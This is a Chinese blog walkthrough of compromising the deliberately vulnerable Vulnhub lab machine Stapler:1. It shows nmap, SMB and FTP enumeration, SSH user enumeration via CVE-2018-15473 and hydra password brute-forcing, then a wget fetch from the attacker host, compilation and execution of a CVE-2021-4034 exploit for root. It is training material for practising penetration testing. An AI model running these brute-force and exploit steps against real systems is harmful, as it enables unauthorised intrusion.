Vulnhub靶机:Stapler1

已于 2024-03-20 21:55:23 修改
阅读量635 收藏 16
点赞数 18
分类专栏: 靶场 文章标签: web安全
于 2024-03-20 21:14:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48904485/article/details/136888734
版权

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.4)

靶机:Stapler: 1(10.0.2.13)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/stapler-1,150/

二、信息收集

使用nmap主机发现靶机ip:10.0.2.13

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:21、22、53、80、139、666、3306、12380

nmap -A 10.0.2.13 -p 1-65535

在这里插入图片描述

21端口:根据nmap的扫描结果,ftp存在匿名登录。登录ftp,发现存在一个note文件

在这里插入图片描述

将该文件下载下来,查看,可以得到两个用户名:elly、john

在这里插入图片描述

Elly,请确保更新有效负载信息。完成后,将其留在您的FTP帐户中,John。

22端口:根据nmap扫描结果,22端口安装OpenSSH 7.2p2,该版本存在用户名枚举漏洞

在这里插入图片描述

下载exp,枚举用户名

python cve-2018-15473-1.py --port 22 --userList ../../user.txt 10.0.2.14

在这里插入图片描述

**80端口:**打开网站未发现什么功能点,查看源码也没有发现什么隐藏信息

在这里插入图片描述

使用dirsearch工具进行目录爆破,发现三个文件,但查看这三个文件没有发现什么有用的信息

在这里插入图片描述

139端口:使用enum4linux工具枚举SMB服务,发现两个可连接的目录和一些用户名

enum4linux -a -o 10.0.2.13

在这里插入图片描述

在这里插入图片描述

使用smbclient连接这两个文件夹,并下载里面的文件

smbclient //10.0.2.13/tmp
smbclient //10.0.2.13/kathy

在这里插入图片描述
在这里插入图片描述

其中todo-list.txt文件里面的内容:I'm making sure to backup anything important for Initech, Kathy

vsftpd.conf文件为ftp的配置文件

666端口:该端口开放未知服务,使用nc连接该端口,发现是一些乱码数据,应该是一些压缩文件或者图片文件

在这里插入图片描述

将连接的数据导入a文件,得到一个压缩包文件

在这里插入图片描述

将压缩包解压得到一张图片

在这里插入图片描述

在这里插入图片描述

**3306端口:**开放mysql服务,mysql版本为5.7.12

**12380端口:**打开网站未发现什么功能点,查看源码也没有发现什么隐藏信息

使用dirsearch工具进行目录爆破也没有发现什么文件或目录

三、漏洞利用

暂时没有找到什么突破口,尝试暴力破解

根据提示Elly用户ftp帐户里面可能有有用的信息,使用hydra暴力破解elly用户

在这里插入图片描述

爆破了很长时间,看了一眼其他人的wp,他们是使用命令如下:

hydra -L user.txt -e nsr 10.0.2.13 ftp
// -L:指定用户名字典
// -e:还可再选的选项,n:null,空密码试探  s:使用与用户名一样的密码试探  r:reverse,使用用户名逆转的密码试探

在这里插入图片描述

得到用户名密码:elly:ylle

使用得到的用户名密码登录ftp,发现passwd文件

在这里插入图片描述

将passwd文件导出

在这里插入图片描述

提取出具有命令执行环境的用户,制作成字典

cat passwd | grep -E "/bin/sh|/bin/bash|/bin/zsh"

在这里插入图片描述

使用得到的字典爆破ssh,得到用户名密码:SHayslett:SHayslett

hydra -L user1.txt -e nsr  10.0.2.13 ssh -t 64

在这里插入图片描述

登录ssh,但不知道为什么直接登录会失败

在这里插入图片描述

当我把靶机的网段改为192.168.x.x的时候,又可以登录了

在这里插入图片描述

四、提权

后面攻击机的IP变更为:192.168.110.4

靶机的IP变更为:192.168.110.5

使用命令uname -a查看系统的内核版本,为Linux red.initech 4.4.0-21-generic

使用cat /etc/*-release命令查看靶机的发行版本为:Ubuntu 16.04 LTS

在这里插入图片描述
使用命令find / -perm -u=s -type f 2>/dev/null查看一下具有SUID权限的二进制可执行文件,发现存在/usr/lib/policykit-1/polkit-agent-helper-1,该版本的polkit存在提权漏洞CVE-2021-4034

在这里插入图片描述

使用web服务器将exp上传到靶机,编译执行,得到root权限

wget http://192.168.110.4/CVE-2021-4034.c
gcc CVE-2021-4034.c -o CVE-2021-4034
./CVE-2021-4034

在这里插入图片描述
获取flag

在这里插入图片描述

参考链接:https://blog.csdn.net/weixin_51982615/article/details/123433810

huang0c
关注
专栏目录
小白的靶机VulnHub-Stapler
wo41ge的博客
12-27 576
从这一台靶机开始 就要上 开机界面就是个这 就凑合一下 开桥接 确定靶机ip地址 :192.168.56.102 要上 了哦!!!!! 扫出 好多 好多 端口 像极了一个蜜罐 我淦 从ftp 入手吧 进行匿名登录 进行查看 下载到本地 打开 康康 Elly说请确保更新了有效负载信息,完成后将其保留在您的FTP帐户中,John 拿到俩个用户Elly和John 继续 ssh 进行 登录 尝试失败 看80端口 使用nikto(开源WEB安全扫描器)进行扫描试试… 没啥用 信息 先放着 继续
Stapler:1 靶机渗透测试-VulnhubSTAPLER: 1)
m0_68117643的博客
08-01 1848
靶机stapler:1)直接导入Vmware无法使用,可先使用VirtualBox打开后再导出虚拟机,使用Vmware打开即可。 思路:12380端口扫描—wpscan爆破用户名——文件包含漏洞利用——修改管理员账户密码——上传webshell——sudo提权......
vulnhub靶机Stapler
bilala的博客
03-11 2009
0x01 靶机安装 难度定位:简单(https://github.com/Ignitetechnologies/CTF-Difficulty 靶机介绍:https://www.vulnhub.com/entry/stapler-1,150/ –> 作者说至少有两种方法拿到普通权限shell,至少三种方法拿到root权限 <– ❕❕在导入靶机到VMware时会跳出这个报错(不知道导VirtualBOX会不会报 解决方法:编辑Stapler.ovf文件,将文档中所有的Caption替换为Eleme
vulnhub靶机实战_DC-8
最新发布
Varin
08-06 735
VulnHub是一个提供渗透测试练习环境的平台。在VulnHub靶机实战中,参与者需要在一个模拟的真实环境中识别和利用安全漏洞。这些靶机通常模仿企业网络或特定操作系统,并包含多种类型的漏洞,如弱密码、配置错误的服务、未打补丁的应用程序等。 实战过程中,参与者使用各种工具和技术来发现漏洞,例如网络扫描、服务识别、漏洞扫描等。随后,利用这些漏洞获取访问权限,逐步提升权限直至获得系统控制权。这类实战有助于提高网络安全技能和对攻击向量的理解。
vulnhub 靶机渗透:Stapler
Mysmycbx的博客
05-29 1221
很有意思的靶机,思路很多,值得学习。
靶场实战(15):OSCP备考之VulnHub STAPLER
OneMoreThink
01-13 1018
打靶思路资产发现主机发现服务发现漏洞发现(获取权限)21端口/FTP服务组件漏洞口令漏洞139端口/SMB服务组件漏洞口令漏洞666端口/doom服务组件漏洞其它漏洞80端口/HTTP服务组件漏洞URL漏洞12380端口/HTTP服务组件漏洞URL漏洞12380端口/HTTPS服务组件漏洞URL漏洞提升权限www-data用户sudosuid cron内核提权信息收集JKanode用户sud...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 4242
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 1914
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2506
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
【打靶记录】VulnHub-stapler靶机渗透wp
qq_39972370的博客
02-12 1160
这是一个适合初学者到中级水平的虚拟机。它有一些挑战,但不会过于复杂。至少有两条路径可以获得一个有限权限的shell。至少有三种方法可以获得root权限。
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
No.10-VulnHub-Stapler: 1-Walkthrough渗透学习
qq_34801745的博客
01-08 2242
** VulnHub-Stapler: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/stapler-1,150/ 靶机难度:中级(CTF) 靶机发布日期:2016年6月8日 靶机描述:Stapler is reported to be one of several vulnerable systems that are supposed ...
看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:2
Aluxian_的博客
06-26 1225
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。Medium这个靶机难度中偏上 因为比较麻烦1.信息收集获取ip地址 和端口信息web等 查看F12源码信息2.文件包含漏洞,包含日志文件ssh写入木马ssh ''@靶机(新知识点!3.nc反弹shell(这里要使用url编码)zip2john爆破和fcrackzip。
10-VulnHub-Stapler
尼德霍格007
07-28 276
vulnhub-Stapler 靶机地址:https://download.vulnhub.com/stapler/Stapler.zip 目标:获得root权限且找到flag.txt 作者:尼德霍格007 时间:2021/7/28 一、信息收集 nmap扫描靶机ip地址 nmap -sP 192.168.21.0/24 可以看到靶机地址是192.168.21.146,192.168.21.128是我kali机的IP地址 扫描开放端口 nmap -A -p 1-10000 192.168.21.146
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(一)Tr0ll
hyjcking的博客
11-20 2235
超级详细的步骤,希望可以为你解决这台靶机提供思路 说实话这个靶机不算难,但是却能比较好的巩固自己的基础知识,期间也遇到了自己不太懂的知识,会做和做的快是有区别的,在渗透这条路上还是任重而道远呐,继续加油
Vulnhub靶机笔记01——Billu_b0x
2301_76329510的博客
04-16 1340
test。
Vulnhub】搭建Vulnhub靶机
qq_53058639的博客
01-23 3099
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
vulnhub靶机系列:
09-09
1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huang0c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值